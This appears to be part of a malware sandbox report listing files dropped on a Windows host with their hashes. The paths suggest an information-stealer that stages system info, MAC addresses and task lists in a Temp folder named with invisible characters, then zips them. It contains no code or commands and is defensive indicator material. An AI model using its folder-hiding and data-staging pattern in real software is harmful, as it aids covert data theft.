C:\Users\Admin\AppData\Local\Temp\‎ ‎‌  ‍  ‍\System\MAC Addresses.txt

MD5 588359aefffbc19c5956e9d30eb2b79d
SHA1 f318fe864199785f4f83ef5d0fb8e67be64b945b
SHA256 9ee763f4e6b107d82b140481ad789f03abae0882c11371f83e2618fbbf1784d4
SHA512 b6a8cf2b96b147df779c90bb3ad9d994fc1faab31d3c06effe4207da3b1e29d6c7ac1f51f7d238d1d2b6ef51f162cc2583d11287a7af19e3b443646c8648c1c7

C:\Users\Admin\AppData\Local\Temp\‎ ‎‌  ‍  ‍\System\System Info.txt

MD5 feb27fbb4e3b306a6ff2544cf070ae00
SHA1 d05417a525bc77d0ffb586b87e2c84990c270c61
SHA256 c1a1b184f0cefc6bdacaa64f599be75d774a0cb56ea7c832bda7bd0291055394
SHA512 f0c1448c6e7af68a54644a09f1ef69499d694e51fc8c3d99157e934c222778503d9cc4138c71d426e8e5dd3d097c8b6ff2fa79e0a398007b213e5c0e781e4b18

C:\Users\Admin\AppData\Local\Temp\‎ ‎‌  ‍  ‍\System\Task List.txt

MD5 ef89dcc69126d98e33381e21b995d1d9
SHA1 40e3008b9f7c3e67379fb70a4939299556f4a988
SHA256 f1e53d651ca3105a3da928ae50734f24d9f870de0dffa9dcc3494cccbf6e1f6e
SHA512 f9ac27d0cffd45a6406854d73c8026f93e5dfa97c9daf998dc730bf55b2a0fff412b8a4a953479a586a9c621d85469d82b13d1977b9e142b7b8de48e0465e0fb

C:\Users\Admin\AppData\Local\Temp\8LMCx.zip

MD5 d4c65f961015bd0b935bd63b4d0a89e8
SHA1 ecf464326b0fa50a40445f0c3499de3ff04ed080
SHA256 6162785cd3b606acd6fb2597ebaccffdacae707ed9dbc40a75089748182123d7
SHA512 b63d413423048abefd6967a48b9d43d93585ddf49e3957de2310408a1979fa5d71089d29f54a17c88205b0a9878ffdf135483b52333f85075358bcc159edff97

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 78e977530971296dd770cbf34b30ef4e
SHA1 c2161eaa60d83873e41dc93b2789b4ca4d355424
SHA256 666993a9c799fb54bad5509cc364298aeca941806cb0ce80d393a361281cfe75
SHA512 b555a794fbc4510336f9e6d064ab901fb741b1a32a87c106579d8d1e594014da4f35a93447dc12eb135ae21ba364ae8f231b1c4b41582ccb07d5dd3dd67ef09b

C:\Users\Admin\AppData\Local\Temp\_MEI33762\blank.aes

MD5 a6527436807cf4197428fb4b1620f21a
SHA1 d61cf45554ae7368c36e7faefe077e678d996d69
SHA256 fba97e63cb801b3d5c94c1c7e725ef3551b88850cf23b75663c1581ebf7e1ff7
SHA512 6446833b36a1fc9a2b73890ac6610b6e961c7e63b78a21745c2126c512ec844491ad74cc42b12b492de67808f74c8a8e9906a20c5766ddf54b9c3fd25a6c129b
